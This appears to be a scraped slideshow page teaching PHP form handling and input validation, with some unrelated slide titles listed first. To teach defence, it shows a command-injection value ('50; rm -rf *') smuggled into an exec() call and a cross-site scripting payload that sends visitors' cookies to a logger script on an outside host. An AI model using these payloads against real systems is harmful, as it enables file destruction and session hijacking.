Md Shaifullar Rabbi
 
APM Midlands Region April 2025 Sacha Hind Circulated.pdf
APM Midlands Region April 2025 Sacha Hind Circulated.pdfAPM Midlands Region April 2025 Sacha Hind Circulated.pdf
APM Midlands Region April 2025 Sacha Hind Circulated.pdf
Association for Project Management
 
Grade 2 - Mathematics - Printable Worksheet
Grade 2 - Mathematics - Printable WorksheetGrade 2 - Mathematics - Printable Worksheet
Grade 2 - Mathematics - Printable Worksheet
Sritoma Majumder
 
Odoo Inventory Rules and Routes v17 - Odoo Slides
Odoo Inventory Rules and Routes v17 - Odoo SlidesOdoo Inventory Rules and Routes v17 - Odoo Slides
Odoo Inventory Rules and Routes v17 - Odoo Slides
Celine George
 
THE STG QUIZ GROUP D.pptx quiz by Ridip Hazarika
THE STG QUIZ GROUP D.pptx quiz by Ridip HazarikaTHE STG QUIZ GROUP D.pptx quiz by Ridip Hazarika
THE STG QUIZ GROUP D.pptx quiz by Ridip Hazarika
Ridip Hazarika
 

Php and web forms

  • 1. PHP AND WEB FORMS BY SANA MATEEN
  • 2. Introduction • What makes the web so interesting and useful is its ability to disseminate information as well as collect it, the latter of which is accomplished primarily through an HTML-based form. • These forms are used to encourage site feedback, facilitate forum conversations, collect mailing and billing addresses for online orders, and much more. • But coding the HTML form is only part of what’s required to effectively accept user input; a server- side component must be ready to process the input. Using PHP for this purpose is the subject of this section. • There are two common methods for passing data from one script to another: GET and POST. • Although GET is the default, you’ll typically want to use POST because it’s capable of handling considerably more data, an important characteristic when you’re using forms to insert and modify large blocks of text. • If you use POST, any posted data sent to a PHP script must be referenced using the $_POST
  • 4. Validating Form Data • These pages will show how to process PHP forms with security in mind. Proper validation of form data is important to protect your form from hackers and spammers! • The first attack results in the deletion of valuable site files, and the second attack results in the hijacking of a random user’s identity through an attack technique known as cross-site scripting. • File Deletion • To illustrate just how ugly things could get if you neglect validation of user input, suppose that your application requires that user input be passed to some sort of legacy command-line application called inventory_manager. • Executing such an application by way of PHP requires use of a command execution function such as exec() or system(), • The inventory_manager application accepts as input the SKU of a particular product and a recommendation for the number of products that should be reordered. For example, suppose the cherry cheesecake has been particularly popular lately, resulting in a rapid depletion of cherries. The pastry chef might use the application to order 50 more jars of cherries (SKU 50XCH67YU), resulting in the following call to inventory_manager: • $sku = "50XCH67YU"; $inventory = "50"; exec("/usr/bin/inventory_manager ".$sku." ".$inventory);
  • 5. • Now suppose the pastry chef has become deranged from an overabundance of oven fumes and attempts to destroy the web site by passing the following string in as the recommended quantity to reorder: • 50; rm -rf * • This results in the following command being executed in exec(): • exec("/usr/bin/inventory_manager 50XCH67YU 50; rm -rf *"); • The inventory_manager application would indeed execute as intended but would be immediately followed by an attempt to recursively delete every file residing in the directory where the executing PHP script resides. • Cross-Site Scripting • There’s another type of attack that is considerably more difficult to recover from—because it involves the betrayal of users who have placed trust in the security of your web site. Known as cross-site scripting, this attack involves the insertion of malicious code into a page frequented by other users (e.g., an online bulletin board). • Merely visiting this page can result in the transmission of data to a third party’s site, which could allow the attacker to later return and impersonate the unwitting visitor. • Suppose that an online clothing retailer offers registered customers the opportunity to discuss the latest fashion trends in an electronic forum. In the company’s haste to bring the custom- built forum online, it decided to skip sanitization of user input, figuring it could take care of such matters at a later point in time. • One unscrupulous customer attempts to retrieve the session keys (stored in cookies) of other customers in order to subsequently enter their accounts. • To see just how easy it is to retrieve cookie data, navigate to a popular web site such as Yahoo! or Google and enter the following into the browser address bar:
  • 6. Using JavaScript, the attacker can take advantage of unchecked input by embedding a similar command into a web page and quietly redirecting the information to some script capable of storing it in a text file or a database. The attacker then uses the forum’s comment-posting tool to add the following string to the forum page: <script> document.location = 'http://www.example.org/logger.php?cookie=' + document.cookie </script>
  • 7. Stripping Tags from User Input 1. Sometimes it is best to completely strip user input of all HTML input, regardless of intent. The introduction of HTML tags into a message board could alter the display of the page, causing it to be displayed incorrectly or not at all. This problem can be eliminated by passing the user input through strip_tags(), which removes all HTML tags from a string. Its prototype follows: 2. string strip_tags(string str [, string allowed_tags])
  • 8. Validating and Sanitizing Data with the Filter Extension Filter extension, you can use these new features to not only validate data such as an e- mail addresses so it meets stringent requirements, but also to sanitize data, altering it to fit specific criteria without requiring the user to take further actions. To validate data using the Filter extension, you’ll choose from one of seven available filter types, passing the type and target data to the filter_var() function. For instance, to validate an e-mail address you’ll pass the FILTER_VALIDATE_EMAIL flag as demonstrated here:
  • 10. Sanitizing Data with the Filter Extension It’s also possible to use the Filter component to sanitize data, which can be useful when processing user input intended to be posted in a forum or blog comments. For instance, to remove all tags from a string, you can use the FILTER_SANITIZE_STRING:
  • 11. Working with Multivalued Form Components • Multivalued form components such as checkboxes and multiple-select boxes greatly enhance your webbased data-collection capabilities because they enable the user to simultaneously select multiple values for a given form item. • For example, consider a form used to gauge a user’s computer-related interests. Specifically, you would like to ask the user to indicate those programming languages that interest him. • Using a few text fields along with a multiple-select box, this form might look similar to that shown below.
  • 12. To make PHP recognize that several values may be assigned to a single form variable, you need to make a minor change to the form item name, appending a pair of square brackets to it. Therefore, instead of languages, the name would read languages[]. Once renamed, PHP will treat the posted variable just like any other array.
  • 13. Taking Advantage of PEAR: HTML_QuickForm2 • Matters can quickly become complicated and error- prone when validation and more sophisticated processing enter the picture. • One such solution is the HTML_QuickForm2 package, available through the PEAR repository. • Installing HTML_QuickForm2 • To take advantage of HTML_QuickForm2’s features, you need to install it from PEAR. Because it depends on HTML_Common2, another PEAR package capable of displaying and manipulating HTML code, you need to install HTML_Common2 also, which is done automatically by passing the -onlyreqdeps flag to the install command. Note that at the time of this writing HTML_QuickForm2 is deemed to be an alpha release, so you’ll need to append -alpha to the end of the package name.
  • 14. PEAR - PHP Extension and Application Repository Stig S. Bakken founded the PEAR project in 1999 to promote the re-use of code that performs common functions. The project seeks to provide a structured library of code, maintain a system for distributing code and for managing code packages, and promote a standard coding style. A PEAR package is distributed as a gzipped tar file. Each archive consists of source code written in PHP, usually in an object-oriented style. Many PEAR packages can readily be used by developers as ordinary third party code via simple include statements in PHP. More elegantly, the PEAR package manager which comes with PHP by default may be used to install PEAR packages so that the extra functionality provided by the package appears as an integrated part of the PHP installation.
  • 15. Creating and Validating a Simple Form • Creating a form and validating form input is a breeze using HTML_QuickForm2. It can dramatically reduce the amount of code you need to write to perform even complex form validation, while simultaneously continuing to provide the designer with enough flexibility to stylize the form using CSS.